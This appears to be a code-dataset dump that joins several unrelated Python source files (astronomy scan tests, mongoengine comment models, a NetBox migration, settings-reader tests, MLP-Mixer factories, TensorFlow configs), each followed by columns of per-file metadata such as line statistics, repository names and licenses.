        Perform a (low resolution) scan, bin, and compare to the input.
        Now with hwp_mueller.
        '''

        mlen = 10 * 60
        rot_period = 120
        mmax = 2
        ra0 = -10
        dec0 = -57.5
        fwhm = 200
        nside = 128
        az_throw = 10

        scs = ScanStrategy(duration=mlen, sample_rate=10, location='spole')

        # Create a 1 x 2 square grid of Gaussian beams.
        scs.create_focal_plane(nrow=1, ncol=2, fov=4, lmax=self.lmax,
                               fwhm=fwhm)

        # Add a HWP Mueller matrix attribute to each beam.
        hwp_mueller = np.asarray([[1, 0, 0, 0],
                                  [0, 1, 0, 0],
                                  [0, 0, -1, 0],
                                  [0, 0, 0, -1]])
        for beami in scs.beams:
            beami[0].hwp_mueller = hwp_mueller
            beami[1].hwp_mueller = hwp_mueller

        # Allocate and assign parameters for mapmaking.
        scs.allocate_maps(nside=nside)

        # Set instrument rotation.
        scs.set_instr_rot(period=rot_period, angles=[68, 113, 248, 293])

        # Set elevation stepping.
        scs.set_el_steps(rot_period, steps=[0, 2, 4])

        # Set HWP rotation.
        scs.set_hwp_mod(mode='continuous', freq=3.)

        # Generate timestreams, bin them and store as attributes.
        scs.scan_instrument_mpi(self.alm, verbose=0, ra0=ra0, dec0=dec0,
                                az_throw=az_throw, scan_speed=2.,
                                nside_spin=nside, max_spin=mmax)

        # Solve for the maps.
        maps, cond = scs.solve_for_map(fill=np.nan)

        # Note that hp.smoothalm smooths self.alm in place, so alm and
        # self.alm refer to the same (smoothed) coefficients below.
        alm = hp.smoothalm(self.alm, fwhm=np.radians(fwhm/60.),
                           verbose=False)
        maps_raw = np.asarray(hp.alm2map(self.alm, nside, verbose=False))

        cond[~np.isfinite(cond)] = 10

        # Compare the solved maps to the smoothed input in
        # well-conditioned pixels only.
        np.testing.assert_array_almost_equal(maps_raw[0, cond < 2.5],
                                             maps[0, cond < 2.5], decimal=10)
        np.testing.assert_array_almost_equal(maps_raw[1, cond < 2.5],
                                             maps[1, cond < 2.5], decimal=10)
        np.testing.assert_array_almost_equal(maps_raw[2, cond < 2.5],
                                             maps[2, cond < 2.5], decimal=10)

if __name__ == '__main__':
    unittest.main()
36.022288
89
0.546653
6,262
48,486
4.063877
0.079208
0.006602
0.038903
0.027232
0.83429
0.819632
0.794286
0.770002
0.757388
0.742966
0
0.04156
0.34544
48,486
1,345
90
36.049071
0.76028
0.149755
0
0.72661
0
0
0.0176
0
0
0
0
0
0.145808
1
0.035237
false
0
0.008505
0
0.048603
0.00486
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
275979f219f542cf2e791f25b9ea58edfcff99cf
1,618
py
Python
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
models/comment.py
hnguyenworkstation/hoocons_backend
725461812a172ca0a88181e3399e6e2294953273
[ "MIT" ]
null
null
null
from datetime import datetime

from mongoengine import *

from static import app_constant


class BaseReplyComment(EmbeddedDocument):
    # Created with base data.
    create_by = ReferenceField('User', required=True)
    text_content = StringField(default="")
    image = StringField(default="")
    # Pass the callable, not its result, so the timestamp is evaluated
    # per document instead of once at import time.
    create_at = DateTimeField(default=datetime.utcnow)
    liked_by = ListField(ReferenceField('User'), default=[])
    is_edited = BooleanField(default=False)

    def get_complete_json(self):
        # The field is named create_by; referencing self.created_by
        # would raise an AttributeError.
        return {
            "created_by": self.create_by.get_simple_header(),
            "create_at": self.create_at,
            "text_content": self.text_content,
            "image": self.image,
            "likes_count": len(self.liked_by),
            "is_edited": self.is_edited
        }


class BaseComment(EmbeddedDocument):
    # Created with base data.
    create_by = ReferenceField('User', required=True)
    text_content = StringField(default="")
    image = StringField(default="")
    create_at = DateTimeField(default=datetime.utcnow)
    liked_by = ListField(ReferenceField('User'), default=[])
    is_edited = BooleanField(default=False)
    replies = ListField(EmbeddedDocumentField(BaseReplyComment), default=[])

    def get_complete_json(self):
        return {
            "created_by": self.create_by.get_simple_header(),
            "create_at": self.create_at,
            "text_content": self.text_content,
            "image": self.image,
            "likes_count": len(self.liked_by),
            "is_edited": self.is_edited,
            "replies": len(self.replies)
        }
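A quick usage sketch for these embedded documents (not part of the original file): the User and Post classes below are hypothetical stand-ins, and a running MongoDB instance is assumed.

import mongoengine
from mongoengine import Document, StringField, ListField, EmbeddedDocumentField


class User(Document):  # Hypothetical stand-in for the real User model.
    name = StringField(default="")

    def get_simple_header(self):
        return {"name": self.name}


class Post(Document):  # Hypothetical parent document that embeds comments.
    comments = ListField(EmbeddedDocumentField(BaseComment), default=[])


mongoengine.connect('comments_demo')  # Assumes a local MongoDB.

author = User(name="alice").save()
comment = BaseComment(create_by=author, text_content="First!")
post = Post(comments=[comment]).save()
print(post.comments[0].get_complete_json())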
31.72549
76
0.653894
172
1,618
5.924419
0.27907
0.064769
0.052993
0.060844
0.802748
0.802748
0.802748
0.802748
0.802748
0.802748
0
0
0.23115
1,618
50
77
32.36
0.819132
0.027812
0
0.684211
0
0
0.086097
0
0
0
0
0
0
1
0.052632
false
0
0.105263
0.052632
0.605263
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7
2762c9973cb9d66693a26a43ece8a7fd87d5a2c8
2,634
py
Python
netbox/ipam/migrations/0044_standardize_models.py
orphanedgamboa/netbox
5cdc38ec3adb5278480b267a6c8e674e9d3fca39
[ "Apache-2.0" ]
1
2022-02-18T03:00:08.000Z
2022-02-18T03:00:08.000Z
netbox/ipam/migrations/0044_standardize_models.py
emersonfelipesp/netbox
fecca5ad83fb6b48a2f15982dfd3242653f105f9
[ "Apache-2.0" ]
1
2021-08-23T15:38:47.000Z
2021-08-23T15:40:10.000Z
netbox/ipam/migrations/0044_standardize_models.py
emersonfelipesp/netbox
fecca5ad83fb6b48a2f15982dfd3242653f105f9
[ "Apache-2.0" ]
1
2018-12-05T12:03:21.000Z
2018-12-05T12:03:21.000Z
import django.core.serializers.json
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('ipam', '0043_add_tenancy_to_aggregates'),
    ]

    operations = [
        migrations.AddField(
            model_name='rir',
            name='custom_field_data',
            field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder),
        ),
        migrations.AddField(
            model_name='role',
            name='custom_field_data',
            field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder),
        ),
        migrations.AddField(
            model_name='vlangroup',
            name='custom_field_data',
            field=models.JSONField(blank=True, default=dict, encoder=django.core.serializers.json.DjangoJSONEncoder),
        ),
        migrations.AlterField(
            model_name='aggregate',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='ipaddress',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='prefix',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='rir',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='role',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='routetarget',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='service',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='vlan',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='vlangroup',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
        migrations.AlterField(
            model_name='vrf',
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        ),
    ]
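The ten AlterField entries differ only in model_name; as a sketch (not how the shipped migration is written), they could be generated with a small hypothetical helper:

from django.db import migrations, models


def bigautofield_alterations(model_names):
    # Build identical BigAutoField alterations for a list of model names.
    return [
        migrations.AlterField(
            model_name=name,
            name='id',
            field=models.BigAutoField(primary_key=True, serialize=False),
        )
        for name in model_names
    ]

# operations = [...AddField entries...] + bigautofield_alterations(
#     ['aggregate', 'ipaddress', 'prefix', 'rir', 'role', 'routetarget',
#      'service', 'vlan', 'vlangroup', 'vrf'])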
33.769231
117
0.580486
239
2,634
6.259414
0.205021
0.078209
0.167112
0.19385
0.81484
0.81484
0.81484
0.81484
0.81484
0.81484
0
0.002186
0.305239
2,634
77
118
34.207792
0.815301
0
0
0.794521
0
0
0.070615
0.01139
0
0
0
0
0
1
0
false
0
0.027397
0
0.068493
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
278cb08cfff66333b600950dd0e23594fef0a259
1,934
py
Python
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
tests/test_read_types.py
OrangutanGaming/django-enhanced-settings
87f4a840953e4bcdc85af96ee4b6baf2df6043a3
[ "MIT" ]
null
null
null
import pytest

from django_enhanced_settings import read_types


def test_read_str():
    assert read_types.read_str('abc') == 'abc'
    with pytest.raises(ValueError, match=r".+ str"):
        read_types.read_str(123)
    assert read_types.read_str('123') == '123'
    with pytest.raises(ValueError, match=r".+ str"):
        read_types.read_str(['123'])
    with pytest.raises(ValueError, match=r".+ str"):
        read_types.read_str(None)


def test_read_bool():
    assert read_types.read_bool(True) is True
    assert read_types.read_bool(False) is False
    assert read_types.read_bool(0) is False
    assert read_types.read_bool(1) is True
    assert read_types.read_bool('f') is False
    assert read_types.read_bool('t') is True
    with pytest.raises(ValueError, match=r".+ bool"):
        read_types.read_bool(2)
    with pytest.raises(ValueError, match=r".+ bool"):
        read_types.read_bool(-1)
    with pytest.raises(ValueError, match=r".+ bool"):
        read_types.read_bool(None)


def test_read_list():
    assert read_types.read_list(['1', '2', '3']) == ['1', '2', '3']
    assert read_types.read_list([1, 2, 3]) == [1, 2, 3]
    with pytest.raises(ValueError, match=r".+ list"):
        read_types.read_list(2)
    assert read_types.read_list([]) == []
    with pytest.raises(ValueError, match=r".+ list"):
        read_types.read_list('123')
    with pytest.raises(ValueError, match=r".+ list"):
        read_types.read_list('1;')
    with pytest.raises(ValueError, match=r".+ list"):
        read_types.read_list(';', ';')
    with pytest.raises(ValueError, match=r".+ list"):
        read_types.read_list(';1', ';')
    assert read_types.read_list('1;', ';') == ['1']
    assert read_types.read_list('1;2', ';') == ['1', '2']
    assert read_types.read_list('a;2;c', ';') == ['a', '2', 'c']
    assert read_types.read_list('1,b,3', ',') == ['1', 'b', '3']
    assert read_types.read_list(';', ',') == [';']
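For reference, here is one implementation of read_str, read_bool, and read_list that satisfies every assertion above; the actual django_enhanced_settings module may be written differently, so treat this as an illustrative sketch.

def read_str(value):
    # Only genuine strings pass through; everything else is rejected.
    if not isinstance(value, str):
        raise ValueError('Cannot read {!r} as str'.format(value))
    return value


def read_bool(value):
    # Accept real bools, the integers 0/1, and the strings 'f'/'t'.
    if isinstance(value, bool):
        return value
    if value in (0, 1):
        return bool(value)
    if value in ('f', 't'):
        return value == 't'
    raise ValueError('Cannot read {!r} as bool'.format(value))


def read_list(value, separator=None):
    # Lists pass through untouched; strings need an explicit separator.
    if isinstance(value, list):
        return value
    if separator is None or not isinstance(value, str):
        raise ValueError('Cannot read {!r} as list'.format(value))
    items = value.split(separator)
    if items[-1] == '':
        items = items[:-1]  # Tolerate a single trailing separator.
    if any(item == '' for item in items):
        raise ValueError('Cannot read {!r} as list'.format(value))
    return items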
37.921569
67
0.6303
284
1,934
4.070423
0.119718
0.217993
0.303633
0.262976
0.878028
0.816609
0.74827
0.573529
0.573529
0.573529
0
0.029114
0.18304
1,934
50
68
38.68
0.702532
0
0
0.255814
0
0
0.071355
0
0
0
0
0
0.372093
1
0.069767
true
0
0.046512
0
0.116279
0
0
0
0
null
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
7
7e01a06a565514f55020329deca6542ae8483479
1,965
py
Python
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
30
2021-05-05T06:25:32.000Z
2022-02-01T11:08:18.000Z
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
2
2021-05-06T14:41:56.000Z
2021-05-28T18:27:59.000Z
mlp_mixer/models.py
isaaccorley/mlp-mixer-pytorch
c890e9fe5eabf38049c4e5a998d4cb3902a02a62
[ "MIT" ]
5
2021-06-07T11:56:26.000Z
2022-02-01T11:08:19.000Z
from mlp_mixer import MLPMixer


def mlp_mixer_s16(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=16, num_layers=8, hidden_dim=512,
                  tokens_hidden_dim=256, channels_hidden_dim=2048)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_s32(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=32, num_layers=8, hidden_dim=512,
                  tokens_hidden_dim=256, channels_hidden_dim=2048)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_b16(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=16, num_layers=12, hidden_dim=768,
                  tokens_hidden_dim=384, channels_hidden_dim=3072)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_b32(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=32, num_layers=12, hidden_dim=768,
                  tokens_hidden_dim=384, channels_hidden_dim=3072)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_l16(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=16, num_layers=24, hidden_dim=1024,
                  tokens_hidden_dim=512, channels_hidden_dim=4096)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_l32(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=32, num_layers=24, hidden_dim=1024,
                  tokens_hidden_dim=512, channels_hidden_dim=4096)
    return MLPMixer(num_classes, image_size, channels, **params)


def mlp_mixer_h14(num_classes: int, image_size: int = 224, channels: int = 3):
    params = dict(patch_size=14, num_layers=32, hidden_dim=1280,
                  tokens_hidden_dim=640, channels_hidden_dim=5120)
    return MLPMixer(num_classes, image_size, channels, **params)
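A brief usage sketch for these factory functions, assuming PyTorch is installed and that MLPMixer consumes NCHW image tensors (the usual PyTorch convention; treat the output shape as an assumption):

import torch

model = mlp_mixer_s16(num_classes=10)  # S/16 variant with 10 output classes.
x = torch.randn(2, 3, 224, 224)        # Batch of 2 RGB images.
logits = model(x)                      # Assumed output shape: (2, 10).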
51.710526
78
0.716031
292
1,965
4.503425
0.157534
0.143726
0.058555
0.095817
0.906464
0.906464
0.906464
0.906464
0.870722
0.870722
0
0.087578
0.180662
1,965
37
79
53.108108
0.729193
0
0
0.448276
0
0
0
0
0
0
0
0
0
1
0.241379
false
0
0.034483
0
0.517241
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
8
fd7f2dc3426246287bad4f40d8250630824d045f
95
py
Python
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
DST_als/utils/get_root_path.py
cyberfish1120/DST_als
7ec706cf93b8e99b5c85259a1a4e434faada1fce
[ "Apache-2.0" ]
null
null
null
import os


def get_root_path():
    return os.path.dirname(__file__).split('DST_als/utils')[0]
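To make the string trick concrete (the path below is hypothetical): if this file lives at /home/user/project/DST_als/utils/get_root_path.py, then os.path.dirname(__file__) is '/home/user/project/DST_als/utils', and splitting on 'DST_als/utils' keeps only the project-root prefix.

# Hypothetical illustration of the split:
path = '/home/user/project/DST_als/utils'
print(path.split('DST_als/utils')[0])  # -> '/home/user/project/'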
19
62
0.726316
16
95
3.875
0.875
0
0
0
0
0
0
0
0
0
0
0.011905
0.115789
95
4
63
23.75
0.72619
0
0
0
0
0
0.136842
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
7
fde463ee3dda763dd624ff213e5ebc0003beed53
84
py
Python
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
tests/test_factory.py
conrad-evans/sports_betting_api
baa80df5608c1cc244f51be86ba29eaabd8f031e
[ "MIT" ]
null
null
null
from src import create_app


def test_config():
    assert not create_app().testing
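This test assumes the Flask application-factory pattern; a minimal create_app that would satisfy it might look like the sketch below (hypothetical; the real src package may configure much more). Flask sets app.testing to False by default, so the assertion passes unless a test config flips it.

from flask import Flask


def create_app(test_config=None):
    app = Flask(__name__)
    if test_config is not None:
        # Tests can pass e.g. {'TESTING': True} to flip app.testing.
        app.config.update(test_config)
    return app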
14
35
0.75
13
84
4.615385
0.846154
0.3
0
0
0
0
0
0
0
0
0
0
0.178571
84
5
36
16.8
0.869565
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
7
e33a5de43caed5fe0e8d1ecae8326b695e7fd562
88
py
Python
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
file_validator/reader/__init__.py
sujavarghese/data-validator
e0c5d94da797cb43b17d6ee193d337cbcb602f49
[ "MIT" ]
null
null
null
from file_validator.reader.reader import *
from file_validator.reader.messages import *
29.333333
44
0.840909
12
88
6
0.5
0.222222
0.472222
0.638889
0
0
0
0
0
0
0
0
0.090909
88
2
45
44
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
e3722f17eaa9f5df4575252cda8b370a7d1803f8
1,364
py
Python
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
4
2018-03-29T12:00:22.000Z
2020-03-06T17:30:46.000Z
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
null
null
null
dnnae/configs/configs.py
myinxd/dnnae-gmm
e1c59e2e93772a36797812169cae119ac00184c5
[ "MIT" ]
null
null
null
# Copyright (C) 2018 Zhixian MA <zx@mazhixian.me>
# MIT license

"""Configurations for the DNNAE network."""

import tensorflow as tf


class config_mnist_bn(object):
    rs = 28
    inputs = tf.placeholder(dtype=tf.float32, shape=(None, rs**2),
                            name='x_in')
    outputs = tf.placeholder(dtype=tf.float32, shape=(None, rs**2),
                             name='x_out')
    numclass = 10
    labels = tf.placeholder(dtype=tf.float32, shape=(None, numclass),
                            name='labels')
    ae_flag = True
    share_flag = False
    keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob')
    layers = [256, 128, 32]
    actfun = [tf.nn.relu, tf.nn.relu, tf.nn.relu]
    batchflag = [True, True, False]


class config_mnist_do(object):
    rs = 28
    inputs = tf.placeholder(dtype=tf.float32, shape=(None, rs**2),
                            name='x_in')
    outputs = tf.placeholder(dtype=tf.float32, shape=(None, rs**2),
                             name='x_out')
    numclass = 10
    labels = tf.placeholder(dtype=tf.float32, shape=(None, numclass),
                            name='labels')
    ae_flag = True
    share_flag = False
    keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob')
    layers = [256, 128, 32]
    actfun = [tf.nn.relu, tf.nn.relu, tf.nn.relu]
    batchflag = [False, False, False]


class config_train(object):
    valrate = 0.2
    batchsize = 100
    epochs = 100
    lr_init = 0.0001
    decay_rate = 0.95
    keep_prob = 0.5
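A feeding sketch for these config classes (assumes TensorFlow 1.x, where tf.placeholder and tf.Session exist; the graph and train op construction live elsewhere in the dnnae package, so train_op below is hypothetical):

import numpy as np

cfg = config_mnist_bn
n = config_train.batchsize

batch = np.zeros((n, cfg.rs ** 2), dtype=np.float32)  # Flattened 28x28 images.
feed_dict = {
    cfg.inputs: batch,
    cfg.outputs: batch,  # Autoencoder: the target is the input itself.
    cfg.labels: np.zeros((n, cfg.numclass), dtype=np.float32),
    cfg.keep_prob: config_train.keep_prob,
}
# with tf.Session() as sess:
#     sess.run(train_op, feed_dict=feed_dict)  # train_op: hypothetical.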
31.72093
83
0.658358
204
1,364
4.303922
0.343137
0.118451
0.164009
0.182232
0.71754
0.71754
0.71754
0.71754
0.71754
0.71754
0
0.059567
0.187683
1,364
42
84
32.47619
0.732852
0.072581
0
0.625
0
0
0.038156
0
0
0
0
0
0
1
0
false
0
0.03125
0
1
0
0
0
0
null
0
0
1
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
7